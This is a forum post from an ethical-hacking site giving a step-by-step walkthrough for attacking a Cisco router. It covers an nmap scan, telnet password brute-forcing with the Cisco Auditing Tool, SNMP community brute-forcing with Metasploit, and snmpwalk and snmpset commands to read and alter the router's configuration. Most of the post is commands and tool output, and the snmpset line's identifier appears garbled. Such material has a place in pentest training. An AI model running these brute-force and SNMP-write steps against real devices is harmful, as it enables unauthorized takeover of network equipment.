- This topic has 0 replies, 1 voice, and was last updated 3 years, 5 months ago by .
- You must be logged in to reply to this topic.
I want to share about How to simple attack Router, maybe in case Router Cisco
First we must scanning with nmap : we can combine attack TCP and UDP..
We hope router open remote access (tcp) and snmp in port (udp)
Use Backtrack or Kali Linux :
nmap -sS -sU -T5 192.168.2.1
29954U@root:/pentest/cisco$ nmap -sS -sU -T5 192.168.2.1
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-05-12 09:04 EDT
Warning: 192.168.2.1 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.2.1
Host is up (0.0022s latency).
Not shown: 1248 closed ports, 749 open|filtered ports
PORT STATE SERVICE
23/tcp open telnet
79/tcp open finger
161/udp open snmp
MAC Address: 00:02:FD:60:77:20 (Cisco Systems)
and then you can see port 23/tcp and 161/udp is open, so we can attack now
Telnet : We can bruteforce using hydra or cisco tools
29954U@root:/pentest/cisco/cisco-auditing-tool$ ./CAT -h 192.168.2.1 -w /pentest/passwords/john/password.lst
Cisco Auditing Tool – g0ne [null0]
Checking Host: 192.168.2.1
Invalid Password: cisco
Invalid Password: ciscos
Invalid Password: cisco1
Invalid Password: router
now you can attack snmp to bruteforce with msfconsole :
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.2.1
rhosts => 192.168.2.1
msf auxiliary(snmp_login) > set THREADS 3
threads => 3
msf auxiliary(snmp_login) > exploit
if success you can see community to read and write…
You can command
snmpwalk -mALL -v1 -c public 192.168.2.1
or if you must exploit you can change with
snmpset -c ILMI -v 2c 192.168.2.1 184.108.40.206.220.127.116.11.18.104.22.168.1.2.666 i 1
All techniq about change you can see in wiki snmpset
Detail Lab : hackingdojo.com
– EH-Net Live! Join us on Wed Jan 29 @ 1:00 PM EST for “Shellcode for the Masses“ w/ John Hammond. Reg Open Now!
– EH-Net Live! December – Video & Deck Available Now! for “Burp-less Hacking – Learning Web Application Pentesting on a Budget” w/ Phillip Wylie from Dec 19.
– EH-Net Live! November – Video & Deck Available Now! for “All Things CTF!” w/ Ray Doyle of EverSecCTF from Nov 21.
– EH-Net Live! October – Video & Deck Available Now! for “Hacking Humans” w/ Hadnagy, Paul & Baron from Oct 29.
– EH-Net Live! August – Video & Deck Available Now! for “Wireshark for Hackers” w/ Laura Chappell from Aug 29.
See all EH-Net Live! Videos
More on the EH-Net YouTube Channel
Copyright ©2020 Caendra, Inc.